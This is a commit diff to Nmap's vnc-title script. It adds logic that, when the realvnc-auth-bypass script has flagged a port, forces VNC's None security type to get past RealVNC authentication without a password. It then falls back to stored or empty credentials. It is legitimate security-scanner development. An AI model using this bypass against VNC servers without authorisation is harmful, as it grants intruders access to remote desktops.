Allow vnc-title to exploit RealVNC auth bypass if discovered.

2025-12-15 04:09:01 +00:00 · 2017-03-03 19:39:57 +00:00
parent 2a5b23f025
commit 76f7c48c17
1 changed files with 45 additions and 15 deletions
--- a/scripts/vnc-title.nse
+++ b/scripts/vnc-title.nse
@@ -13,6 +13,9 @@ license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
 categories = {"intrusive", "discovery"}

 ---
+-- @see vnc-brute
+-- @see realvnc-auth-bypass
+--
 -- @output
 -- | vnc-title:
 -- |   name: LibVNCServer
@@ -24,7 +27,7 @@ categories = {"intrusive", "discovery"}
 -- <elem key="geometry">1024 x 768</elem>
 -- <elem key="color_depth">24</elem>

-dependencies = {"vnc-brute"}
+dependencies = {"vnc-brute", "realvnc-auth-bypass"}

 portrule = shortport.port_or_service( {5900, 5901, 5902} , "vnc", "tcp", "open")

@@ -42,25 +45,52 @@ action = function(host, port)
  status, data = v:handshake()
  if ( not(status) ) then return fail(data) end

-  local c = creds.Credentials:new(creds.ALL_DATA, host, port)
-  local tried = 0
-  for cred in c:getCredentials(creds.State.VALID + creds.State.PARAM) do
-    tried = tried + 1
-    stdnse.debug1("Trying creds: %s:%s", cred.user, cred.pass)
-    status, data = v:login(cred.user, cred.pass)
+  -- If this doesn't work, start over.
+  status = false
+  local reg = host.registry["realvnc-auth-bypass"]
+  if reg and reg[port.number] then
+    stdnse.debug1("Trying RealVNC Auth Bypass")
+    -- Force None auth type and try to init to exploit
+    v:sendSecType(vnc.VNC.sectypes.NONE)
+    status, data = v:login_none()
    if status then
-      break
+      status, data = v:client_init(true)
+      if not status then
+        stdnse.debug1("RealVNC Auth Bypass failed.")
+      end
+    end
+    if not status then
+      -- clean up and start over
+      v:disconnect()
+      status, data = v:connect()
+      if not status then return fail(data) end
+      status, data = v:handshake()
+      if not status then return fail(data) end
+      -- Be sure to let the regular login stuff have a try
+      status = false
    end
  end
-  if tried < 1 then
-    --worth trying a None-type login
-    stdnse.debug1("Trying empty creds, for None security type")
-    status, data = v:login("", "")
-  end
  if not status then
-    return fail(("Couldn't log in: %s"):format(data))
+    local c = creds.Credentials:new(creds.ALL_DATA, host, port)
+    local tried = 0
+    for cred in c:getCredentials(creds.State.VALID + creds.State.PARAM) do
+      tried = tried + 1
+      stdnse.debug1("Trying creds: %s:%s", cred.user, cred.pass)
+      status, data = v:login(cred.user, cred.pass)
+      if status then
+        break
+      end
+    end
+    if tried < 1 then
+      --worth trying a None-type login
+      stdnse.debug1("Trying empty creds, for None security type")
+      status, data = v:login("", "")
+    end
+    if not status then
+      return fail(("Couldn't log in: %s"):format(data))
+    end
+    status, data = v:client_init(true)
  end
-  status, data = v:client_init(true)
  if status then
    local out = stdnse.output_table()
    out.name = data.name